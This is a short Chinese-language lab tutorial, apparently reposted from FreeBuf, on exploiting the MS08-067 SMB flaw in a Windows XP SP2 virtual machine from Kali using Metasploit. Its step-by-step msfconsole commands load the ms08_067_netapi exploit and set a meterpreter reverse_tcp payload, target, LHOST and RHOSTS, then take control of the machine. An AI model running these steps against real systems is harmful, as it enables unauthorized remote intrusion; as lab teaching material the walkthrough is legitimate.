简单的MS08-067漏洞利用 – 作者:字母安全lrving

19次阅读
没有评论

实验前准备

工具准备:kali、WindowsXP SP2

  1. kali的安装可参考文章:渗透工具准备–kali的安装

  2. WindowsXP SP靶机打包地址:

    链接: https://pan.baidu.com/s/1AzuiMIzY7ncKR-txiMEa-w 提取码: 427i

开启两台虚拟机,在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,测试连通性

简单的MS08-067漏洞利用 - 作者:字母安全lrving

实验开始

1.在kali终端中开启msfconsole

kali@kali:~$ msfconsole

简单的MS08-067漏洞利用 - 作者:字母安全lrving

2.查找攻击模块并使用

msf5 > search ms08_067msf5 > use exploit/windows/smb/ms08_067_netapi

简单的MS08-067漏洞利用 - 作者:字母安全lrving

3.设置payload

set payload windows/meterpreter/reverse_tcp

简单的MS08-067漏洞利用 - 作者:字母安全lrving

4.设置targets、LHOST、RHOSTS

set target Windows XP SP2 Chinese - Simplified (NX)set LHOST 攻击机ipset RHOSTS 靶机ip

简单的MS08-067漏洞利用 - 作者:字母安全lrving

5.开始渗透

exploit/run

简单的MS08-067漏洞利用 - 作者:字母安全lrving

可以看到已经渗透成功~

到这里就可以使用Metasploit的命令对靶机进行一些操作,比如给靶机截图……

简单的MS08-067漏洞利用 - 作者:字母安全lrving

本实验仅用于学习使用,若用于其他用途所造成后果与本人无关!

原文来自公众号:【字母安全】

来源:freebuf.com 2020-11-09 00:56:04 by: 字母安全lrving

正文完
 0
评论(没有评论)